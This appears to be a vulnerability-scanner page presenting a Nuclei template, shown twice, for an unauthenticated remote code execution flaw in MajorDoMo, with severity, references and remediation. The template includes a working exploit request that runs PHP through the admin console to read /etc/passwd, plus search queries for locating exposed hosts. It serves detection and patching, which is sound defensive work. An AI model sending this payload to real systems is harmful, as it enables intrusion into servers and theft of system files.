MajorDoMo - Unauthenticated RCE

CVE-2026-27174

Early Release

Description

MajorDoMo contains a remote code execution caused by an include order bug and lack of exit after redirect in admin panel's PHP console, letting unauthenticated attackers execute arbitrary PHP code via crafted GET requests.

Severity

Critical

CVSS Score

Affected Product

majordomo

Published Date

April 20, 2026

Template Author

0x_akoko

CVE-2026-27174.yaml

id: CVE-2026-27174

info:
  name: MajorDoMo - Unauthenticated RCE
  author: 0x_Akoko
  severity: critical
  description: |
   MajorDoMo contains a remote code execution caused by an include order bug and lack of exit after redirect in admin panel's PHP console, letting unauthenticated attackers execute arbitrary PHP code via crafted GET requests.
  impact: |
   Unauthenticated attackers can execute arbitrary PHP code remotely, potentially leading to full system compromise.
  remediation: |
   Update to the latest version with the fix for the include order bug and proper exit after redirect.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2026-27174
    - https://github.com/sergejey/majordomo/issues/1177
    - https://chocapikk.com/posts/2026/majordomo-revisited
    - https://www.vulncheck.com/advisories/majordomo-unauthenticated-remote-code-execution-via-admin-console-eval
  classification:
    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
    cvss-score: 10.0
    cve-id: CVE-2026-27174
    cwe-id: CWE-94
    cpe: cpe:2.3:a:sergejey:majordomo:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: sergejey
    product: majordomo
    fofa-query: body="templates/application.html"
    shodan-query: http.html:"templates/application.html"
  tags: cve,cve2026,rce,majordomo,php,unauth

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains_all(body, 'MajordomoSL', 'templates/application.html', 'majordomo')"
        condition: and
        internal: true

  - raw:
      - |
        GET /admin.php?ajax_panel=1&op=console&command=echo+file_get_contents%28%27%2Fetc%2Fpasswd%27%29%3B HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:[x*]:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100e3156a05a1217f1ee455fa22ba34a6969d9b8c79a5ff8e2b94c0ff23b588df6e02206ba81d6dc48e8f9940b4ed3ac5516832b05f7f166069c7f4508f29aeff6d4fef:922c64590222798bb761d5b6d8e72950

10.0Score

CVSS Metrics

CVSS Vector:

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CVE ID:

cve-2026-27174

CWE ID:

cwe-94

References

https://nvd.nist.gov/vuln/detail/CVE-2026-27174 https://github.com/sergejey/majordomo/issues/1177 https://chocapikk.com/posts/2026/majordomo-revisited https://www.vulncheck.com/advisories/majordomo-unauthenticated-remote-code-execution-via-admin-console-eval

Remediation Steps

Update to the latest version with the fix for the include order bug and proper exit after redirect.

id: CVE-2026-27174

info:
  name: MajorDoMo - Unauthenticated RCE
  author: 0x_Akoko
  severity: critical
  description: |
   MajorDoMo contains a remote code execution caused by an include order bug and lack of exit after redirect in admin panel's PHP console, letting unauthenticated attackers execute arbitrary PHP code via crafted GET requests.
  impact: |
   Unauthenticated attackers can execute arbitrary PHP code remotely, potentially leading to full system compromise.
  remediation: |
   Update to the latest version with the fix for the include order bug and proper exit after redirect.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2026-27174
    - https://github.com/sergejey/majordomo/issues/1177
    - https://chocapikk.com/posts/2026/majordomo-revisited
    - https://www.vulncheck.com/advisories/majordomo-unauthenticated-remote-code-execution-via-admin-console-eval
  classification:
    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
    cvss-score: 10.0
    cve-id: CVE-2026-27174
    cwe-id: CWE-94
    cpe: cpe:2.3:a:sergejey:majordomo:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: sergejey
    product: majordomo
    fofa-query: body="templates/application.html"
    shodan-query: http.html:"templates/application.html"
  tags: cve,cve2026,rce,majordomo,php,unauth

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains_all(body, 'MajordomoSL', 'templates/application.html', 'majordomo')"
        condition: and
        internal: true

  - raw:
      - |
        GET /admin.php?ajax_panel=1&op=console&command=echo+file_get_contents%28%27%2Fetc%2Fpasswd%27%29%3B HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:[x*]:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100e3156a05a1217f1ee455fa22ba34a6969d9b8c79a5ff8e2b94c0ff23b588df6e02206ba81d6dc48e8f9940b4ed3ac5516832b05f7f166069c7f4508f29aeff6d4fef:922c64590222798bb761d5b6d8e72950

MajorDoMo - Unauthenticated RCE

Description

Severity

CVSS Score

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps

MajorDoMo - Unauthenticated RCE

Description

Severity

CVSS Score

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps